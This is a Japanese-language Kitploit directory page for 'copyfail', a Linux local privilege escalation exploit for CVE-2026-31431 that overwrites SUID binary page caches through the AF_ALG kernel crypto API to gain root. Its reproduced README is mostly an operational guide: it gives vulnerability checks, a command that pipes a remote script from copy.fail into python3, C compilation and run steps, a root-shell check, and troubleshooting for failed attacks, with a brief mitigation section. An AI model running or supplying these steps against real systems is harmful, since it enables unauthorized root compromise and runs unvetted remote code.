Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
copyfail — Linux のローカル権限昇格エクスプロイトで、CVE-2026-31431 に対応し、AF_ALG カーネル暗号 API を介して SUID バイナリのページキャッシュを上書きすることで root 権限を取得します。 | Kitploit
ツール/GitHubGitHub/minime794/copyfail
特権昇格脆弱性分析エクスプロイトバイナリエクスプロイト
GitHubminime794/copyfail

copyfail

Linux のローカル権限昇格エクスプロイトで、CVE-2026-31431 に対応し、AF_ALG カーネル暗号 API を介して SUID バイナリのページキャッシュを上書きすることで root 権限を取得します。

リポジトリを見る
6時間40分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Copy Fail (CVE-2026-31431) – エクスプロイト使用ガイド

元のReadmeは @painoob より取得

2017 / 2016 以降のすべてのカーネルバージョンが脆弱です!カーネル7は完全に免疫があり、その他(5〜7の間)は依然として脆弱である可能性があります

⚠️ 免責事項

このコンテンツは教育および許可されたセキュリティテストのみを目的としています。明示的な許可なくシステム上でこれを実行しないでください。


📌 概要

Copy Fail (CVE-2026-31431) は、AF_ALG を介してカーネル暗号APIに影響を与えるLinuxのローカル特権昇格(LPE)脆弱性です。

これにより、非特権ユーザーがSUIDバイナリ(例: /usr/bin/su)のページキャッシュデータを上書きし、rootアクセスを取得できます。


🧠 要件

システム要件

  • Linuxカーネル(脆弱 – パッチ適用状況に依存)
  • AF_ALG が有効
  • algif_aead モジュールがロード済み

Pythonエクスプロイトの要件

  • Python 3.10+
  • 以下をサポート:
    • os.splice
    • socket(AF_ALG)

🔍 脆弱性の確認

root@kitploit:~
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

期待される指標:

  • authencesn(hmac(sha256),cbc(aes))
  • algif_aead がロード済み

🐍 Pythonエクスプロイトの実行

1. 直接実行

root@kitploit:~
python3 copy_fail_exp.py

2. またはcurl経由(リモートホストの場合)

root@kitploit:~
curl https://copy.fail/exp | python3

3. rootシェルを起動

root@kitploit:~
su
id

期待される結果:

root@kitploit:~
uid=0(root)

⚠️ よくある問題(Python)

❌ エラー: os.splice not found

原因:

  • Pythonバージョン < 3.10
  • 制限されたビルド

解決策:

  • より新しいPythonバイナリを使用する
  • 静的Pythonインタプリタをアップロードする

⚙️ Cバージョンのコンパイル

1. コンパイル

root@kitploit:~
gcc copy_fail_exp.c -o copy_fail

2. 実行可能にする

root@kitploit:~
chmod +x copy_fail

3. エクスプロイトを実行

root@kitploit:~
./copy_fail
su

⚠️ よくある問題(C)

❌ エクスプロイトは実行されるがrootにならない

考えられる原因:

  • カーネルにパッチ適用済み
  • オフセットが正しくない
  • 環境の不一致

❌ コンパイルエラー

必要なツールをインストール:

root@kitploit:~
apt update && apt install build-essential

🧪 トラブルシューティング

システムにパッチが適用されているか確認

root@kitploit:~
dmesg | grep -i alg

モジュールを確認

root@kitploit:~
lsmod | grep algif_aead

🛡️ 緩和策

脆弱なモジュールを無効化

root@kitploit:~
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

カーネルパッチを適用

システムを更新:

root@kitploit:~
apt update && apt upgrade

📌 注意事項

  • エクスプロイトはページキャッシュのみを変更する(非永続的)
  • ローカルアクセスが必要
  • デフォルトではリモートから悪用不可

🧠 最終的な洞察

エクスプロイトが失敗した場合、以下を検討:

  • カーネルに既にパッチが適用されている
  • 環境の制限
  • 代替の特権昇格ベクター(SUID、ケイパビリティ、sudoの設定ミス)

📚 参考文献

  • https://copy.fail/
  • CVE-2026-31431

👨‍💻 著者からの注意

このエクスプロイトは、ラボ、CTF、および許可されたペネトレーションテストでのみ責任を持って使用してください。

ツールをダウンロード